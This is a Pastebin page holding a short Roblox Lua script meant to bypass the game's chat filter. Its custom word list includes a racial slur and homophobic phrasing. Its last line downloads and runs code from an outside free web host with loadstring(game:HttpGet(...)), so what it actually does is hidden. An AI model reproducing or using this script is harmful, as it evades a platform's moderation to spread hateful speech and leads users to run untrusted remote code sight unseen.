Advertisement
YourNotWorth

sup booga

Jul 21st, 2019
258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. _G.Option = 'all'; --[[
  2. Current options:
  3. - all: bypasses every word you write
  4. - keywords: bypasses only the list of words
  5. ]]
  6. _G.Auto_Update = {
  7. Enabled = true;
  8. Delay = 60; -- seconds
  9. }
  10. _G.Custom_Words = { -- your own custom words / sentences!
  11. 'nigga you are big',
  12. 'fuck somegay shit', -- etc
  13. }
  14. if not pcall(function()loadstring(game:HttpGet('https://xhamiii.000webhostapp.com/%27,true))()end)then warn'host is currently down'end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement